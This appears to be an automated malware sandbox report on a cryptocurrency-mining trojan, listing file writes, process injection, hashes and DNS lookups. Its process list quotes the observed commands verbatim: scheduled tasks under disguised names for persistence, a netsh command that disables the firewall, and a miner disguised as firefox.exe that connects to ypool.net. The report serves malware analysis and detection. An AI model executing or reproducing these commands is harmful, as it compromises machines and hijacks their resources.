File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\~qzbmlki.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ro-RO\~whfmqsm.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\~egjjrza.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\~suhwevh.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_2019.430.2026.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\~pxycziy.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\~qzbmlki.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ro-RO\~whfmqsm.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\~njxvzlc.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\~qzkwnlh.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\~lggycpe.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PlaceCard\contrast-white\~lnugsvv.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\~awbhnex.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\~cinivab.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\~awbhnex.tmp C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\~bvvdmbp.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\~gknjcsz.tmp C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3548 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 3548 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 4144 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 4144 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 1000 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\netsh.exe
PID 1000 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\netsh.exe
PID 1000 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 616 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 616 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4100,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe

"C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 34 /TN "ComAgent" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\ComAgent.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 15 /TN "DAEMON Tools Lite" /TR "\"C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 20 /TN "IDT PC Audio" /TR "\"C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 29 /TN "IntelAPMClient" /TR "\"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "AutoUpdate Monitor" /TR "\"C:\Users\Admin\Documents\My Pictures\almon.exe\""

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" firewall set opmode mode=DISABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 34 /TN "ComAgent" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\ComAgent.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 15 /TN "DAEMON Tools Lite" /TR "\"C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 20 /TN "IDT PC Audio" /TR "\"C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 29 /TN "IntelAPMClient" /TR "\"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "AutoUpdate Monitor" /TR "\"C:\Users\Admin\Documents\My Pictures\almon.exe\""

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -o ypool.net -u node.bot4 -p x -t 2 -m512

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -o ypool.net -u node.bot4 -p x -t 2 -m512

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 ypool.net udp

Files

memory/3548-0-0x0000000003270000-0x0000000003271000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe

MD5 0db351c2c43f243ea9335c8b8b58b6a0
SHA1 5b2d295d4b2a489bad864896d73e0ea26c2d50cf
SHA256 ce544d0f3b44382b5a0f7632c3bba2cf2ec470d8744513fbba1e7dab2c5b23b4
SHA512 cc2201665d3dd4ac72f387b97a97442fde1b2908024c409410a4f4a368030080ecd9e5e9412095003bfcaf4f224d39219ab6c64b942c505961dc8814de82bbf6

memory/4144-17-0x0000000004B10000-0x0000000004B11000-memory.dmp

C:\Users\Admin\Pictures\~rtilhxt.tmp

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

MD5 713607af08c8ba3ad6dad3e76eae6656
SHA1 43b3e00ea259c9fe38a9a3efe88153c96f205d27
SHA256 52e8cfbda670f28cd2dd1a13cfbfadfe3d0763a63329fadc23d71231f6c38a7c
SHA512 3b9c15a01b2c30696decb053949ca1de44f800e35424560ded405495b255e40971fe7abb3b6345d31f782d5480f1894a77c1b15555ff8ef49c94bfd88a3e1e89

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\plugin-container.exe

MD5 e1972b3e41b543d7a5beb197bac8dda1
SHA1 1f58ca46f064ce1ee0ab96341a180f227f595330
SHA256 cb4145fc3f50899531759691efe0d6708d20aef0b805d2e79b01a35d4fd6ef0f
SHA512 a491d8bfaed5cc82370b914474b3547db06055f5d734368c4f492b354d20761d6e570ae0f75d5bd8b399bf72ebd2e2eeb7371e4111ce28cd4167f224e6fdc4b3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\ComAgent.exe

MD5 bc203ff8ecaf10cd0f83e62cab770801
SHA1 afec328bce41a67d884e59f8aed973ef4ad01ce9
SHA256 eab689d5482d1bbc8384e82f88a9c0a5cee4439ff41abf30887adf407faffe65
SHA512 719c1e3854eee9113fef708f7b1b8ff85aa9e3b4633bbda936aef81736ff2d7aa2ca087592e1768e80769c420051aad9a77b67eaadb7159801f9c3b4ee2fb57a

C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe

MD5 98e9512833ebeefaac2bbabdc769a10b
SHA1 8b7777cc5dca13b05916049f35532773be5dd22b
SHA256 540e7825b1a02018340b91a54b172ebd303072b1d54bdc86334f89f418fe09eb
SHA512 c0046df0cd1a3dc44bc80b44139e7a8af00e3ca87cf43d50dcd8491b4ef0af1680873ad343dfe3101293b617b3758b142b6facf5fc5fb40a93e6dcb3a5a46ba7

C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe

MD5 c469327edd62a78585e007498de8cb50
SHA1 f0f0ba70ee981ac566a2c9dd68bd578f9caa6fa3
SHA256 34df59546f06ecb451b30aa8a3f6a70a330bf94d9006cd63ab51aeedc35b785d
SHA512 db269100d6b86b94ca714506a7026af0133b2035e762d1228b90bf84d1a0cffee9aefd3e2221b49a1db79a9cae4066cc9811e6db8d3d4f109d2d3d5855db7070

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe

MD5 e775e3ec65fcc719db7b7f83be8b7fc7
SHA1 2137a7bf5c5d65323286ba096aa4c499c56b5c38
SHA256 2f2b252255a43b3d73935d52c369e8f85d909636b3768630f8abf46a43bdfa00
SHA512 9cd4d515044ca90989b379e1d52ae329f80de9f8b7d08e2474f56e39c1f474272017931a8d2a9d7d2222e54ba346dc2630c02dfbbc7579fd0691abda53a1f777

C:\Users\Admin\Documents\My Pictures\almon.exe

MD5 e081581af802d150cdcddaeb53ca3a8a
SHA1 af016480c8f711f66793d8b832c716b8f04f24a5
SHA256 dd33a8f0199061b1cc54ad12dc3bcc7d5cb65a94bf59446b35453a232c5892b8
SHA512 4e8d114af3d6b7d17bbaef5f879ecbbcea11bc5f190012432545abe95d379052a6374513b4deecf3b48176fe4c6f5333f38c4ffae2f0d021da815d5e4e3c4bc6

C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe

MD5 ce4de2160996dafe099b77e081c53172
SHA1 4995ddef80086ddaddaac72b53918f3dfe11604e
SHA256 4982bdc85f5c89603c63cd642f62734a3bbd65f3dad5d573e7c708a58d087126
SHA512 47f40e0d6300fa29a7629c1eeba290368403fc8126fe303881ba59aeb999afbbed96ee465b9c456623b9f69ce1661c76fce3e228731aebb63d8f5455ec91afbd

memory/2488-553-0x000001EC96C60000-0x000001EC96C89000-memory.dmp

memory/4848-554-0x000002C5996D0000-0x000002C5996F9000-memory.dmp